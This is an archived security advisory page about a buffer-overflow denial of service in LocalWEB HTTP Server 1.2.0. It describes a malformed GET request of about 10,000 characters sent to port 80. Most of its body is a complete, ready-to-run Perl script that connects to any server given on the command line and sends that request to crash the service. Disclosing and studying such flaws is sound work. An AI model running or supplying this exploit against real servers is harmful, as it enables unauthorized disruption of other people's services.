Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Servers :: localweb.htm

LocalWEB Buffer Overflow



    LocalWEB HTTP Server 1.2.0


    The  Ussr  Labs  team  has  recently  discovered a buffer overflow
    memory problem in  the LocalWEB HTTP  Server.  What  happens is by
    performing an attack  with a malformed  URL request to  port 80 it
    will cause the process containing the services to stop responding.

    The  http  Server  (Port  80)  service  has an overflow in the GET

        [$ telnet 80
        Connected to
        Escape character is '^]'.
        GET /[buffer]

    Where  [buffer]  is  approx.  10000  characters,  and  the process
    containg the service crashes.

    Code in Perl:

    # ./$ -s <server>
    # Malformed GET URL request DoS
    use Getopt::Std;
    use Socket;
    getopts('s:', \%args);
    $foo = "A";                           # this is the NOP
    $number = "10000";                    # this is the total number of NOP
    $data .= $foo x $number;              # result of $foo times $number
    $serv = $args{s};                     # remote server
    $port =  80;                          # remote port, default is 80
    $buf = "GET /$data HTTP/1.0\r\n\r\n"; # issue this response to the
    $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
    $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
    $proto = getprotobyname('tcp') || die("Error: $!\n");
    socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
    connect(S, $paddr) ||die ("Error: $!");
    select(S); $| = 1; select(STDOUT);
    print S "$buf";
    print("Data has been successfully sent to $serv\n");
    sub usage {die("\n\n$0 -s <server>\n\n");}


    Upgrade to 2.0 here:

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH